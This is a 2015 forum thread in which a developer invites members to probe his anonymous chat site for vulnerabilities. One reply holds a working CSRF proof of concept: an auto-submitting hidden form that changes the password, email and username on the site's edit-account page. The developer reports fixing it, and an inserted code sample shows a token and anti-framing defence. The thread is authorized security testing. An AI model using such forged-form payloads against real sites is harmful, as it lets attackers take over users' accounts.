aleee, posted April 7, 2015:
Hi,
I've finished building a personal project that I'd like to 'test' a bit before launching it.
What is it about? In short: anonymous chat. Basically you create an account and then some 'anonymous' people will communicate with you.
The site is based on websockets. The ws server is written in nodejs and the rest is php+mysql.
How to test? You log in from the browser and then connect to your profile page with another browser or in incognito.
So... if you can take a look, maybe you'll find some vulnerabilities (you can do anything; afterwards I'll wipe the whole db, i.e. the accounts).
Proof: www.chatlike.me/rst.txt
If there are questions or advice, I'm waiting for them here.
Thanks,
Alexandru

askvrit, posted April 7, 2015:
I really like how the site looks, it doesn't seem vulnerable.

SimpluAlaSmecher, posted April 7, 2015:
"Aplicația nu este configurată: Dezvoltatorii acestei aplicații nu au configurat corect aplicația pentru Conectare cu Facebook."
So what are we doing, forgetting to turn off test mode?
----
And, not using Ratchet?

Kay97, posted April 7, 2015:
Simple but attractive design. PM me if you want it translated into Italian, free of charge, obviously.

aleee (author), posted April 7, 2015:
@Kay97 - Yes, thanks in advance ... over the next few days I'll get everything sorted out and send you a lang file.

yo20063, posted April 7, 2015 (edited April 7, 2015):

    <html>
      <body onload="javascript:document.forms[0].submit()">
        <H2>CSRF</H2>
        <form method="POST" name="form0" action="http://www.chatlike.me/user/edit-account">
          <input type="hidden" name="password" value="password"/>
          <input type="hidden" name="email" value="test123@test.com"/>
          <input type="hidden" name="username" value="test"/>
          <input type="hidden" name="name" value="test"/>
          <input type="hidden" name="submit-edit-account" value="true"/>
        </form>
      </body>
    </html>

// Sorry for taking your test account; it now has the username baubau and the same password, if you want it back.
// You're welcome. While you're at it, add a frame buster too.

aleee (author), posted April 7, 2015 (edited April 7, 2015):
@yo20063 - Fixing it now. Thanks!
Edit:
- csrf: fixed.
- frame buster: fixed.

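One way the two fixes reported in the post above could look, as an added example that is not part of the thread and not the site's actual code. It is sketched in Node.js for illustration (the thread says the HTTP side is PHP); `SECRET`, `issueCsrfToken`, `verifyCsrfToken`, `handleEditAccount`, the `csrf_token` field and the session id are hypothetical names and constructed values.

```javascript
// Added example: session-bound CSRF token plus anti-framing response headers.
const crypto = require('crypto');

// Assumption: a per-deployment secret kept server-side; random here so the demo runs offline.
const SECRET = crypto.randomBytes(32);

// Token = HMAC(secret, sessionId); rendered as a hidden field in the edit-account form.
function issueCsrfToken(sessionId) {
  return crypto.createHmac('sha256', SECRET).update(sessionId).digest('hex');
}

// Constant-time comparison; a missing or malformed token fails closed.
function verifyCsrfToken(sessionId, token) {
  if (typeof token !== 'string') return false;
  const expected = Buffer.from(issueCsrfToken(sessionId), 'hex');
  const given = Buffer.from(token, 'hex');
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

// Headers that tell the browser not to render the page inside another origin's frame.
// Enforced by the browser itself, unlike a script-based frame buster.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Hypothetical handler for POST /user/edit-account; returns the HTTP status code.
function handleEditAccount(sessionId, body) {
  if (!verifyCsrfToken(sessionId, body.csrf_token)) return 403;
  // ... apply the account changes here ...
  return 200;
}

// Constructed sample input: the fields of the auto-submitted form in the thread (no token),
// and the same fields sent from the site's own form (token included).
const session = 'constructed-session-id-1';
const forged = { password: 'password', email: 'test123@test.com', username: 'test',
                 name: 'test', 'submit-edit-account': 'true' };
const legit = { ...forged, csrf_token: issueCsrfToken(session) };

console.log('cross-site form:', handleEditAccount(session, forged));
console.log('same-site form: ', handleEditAccount(session, legit));
console.log(antiFramingHeaders());
```
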
rotube, posted April 7, 2015:
"App Not Setup: The developers of this app have not set up this app properly for Facebook Login."
Your Facebook app isn't working.

BaiatFinutz, posted April 7, 2015:
Simple and intuitive. If you need help with the site or a translation into Spanish, let me know. Good luck.

askvrit, posted April 7, 2015:
> Simple and intuitive. If you need help with the site or a translation into Spanish, let me know. Good luck.
You don't know Romanian and you want to translate into Spanish :))

aleee (author), posted April 8, 2015:
@BaiatFinutz - thanks! I'll keep it in mind!

Wav3, posted April 8, 2015 (edited April 8, 2015):
What criteria does the search use? I hit Search without typing anything and it shows me the results in a different order every time.
EDIT #2: Got it, it does a Shuffle if I don't type anything.
EDIT #1: Put in a 404 or some kind of redirect for when the profile doesn't exist: http://www.chatlike.me/profile/Wav3aaaaaa

aleee (author), posted April 8, 2015:
@Wav3 - fixed it with a 404.

BaiatFinutz, posted April 10, 2015:
@askvrit I don't know Romanian because I've been in Spain since I was 6.

aleee (author), posted April 13, 2015:
OK... I figured I wouldn't open another topic on this, so I'll ask here. Do you know a site where I can buy traffic? If possible, one where I can choose the niche I want... Thanks.

askvrit, posted April 13, 2015:
@aleee I wasn't paying attention from the start. But today I notice you're talking about an anonymous chat where you log in with your Facebook account. If you don't log in with Facebook, you have to create an account that you then log in from. Anonymous=Nologs! Get the idea? A n o n y m o u s.
By anonymous maybe he means that you don't know who you're talking to, like connected 2 me.

aleee (author), posted April 14, 2015:
@tqcsu - you're thinking too 1337.
Does anyone have an answer to what I asked above?